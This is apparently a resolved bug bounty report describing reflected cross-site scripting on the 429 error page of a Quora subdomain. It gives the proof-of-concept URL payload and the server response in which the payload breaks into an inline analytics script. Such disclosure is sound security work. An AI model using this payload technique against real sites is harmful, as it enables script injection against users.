[controlsyou.quora.com] 429 Too Many Requests Error-Page XSS
Medium
Q
Quora
Submitted None
Actions:
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**Summary:**
XSS on the error page when the user makes too many requests.
### Steps To Reproduce
1. Make a lot of requests to get the error 429
2. Open PoC in FireFox
```
https://controlsyou.quora.com/'-alert(document.domain)-'
```
**HTTP Response**
```
<script type="text/javascript">
...
ga('set', 'dimension1', 'board-'-alert(document.domain)-'');
ga('set', 'dimension2', 'False');
ga('set', 'dimension3', 'False');});});</script>
```
### Optional: Your Environment (Browser version, Device, app version, os version etc)
Tested on FireFox 50.0.2
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic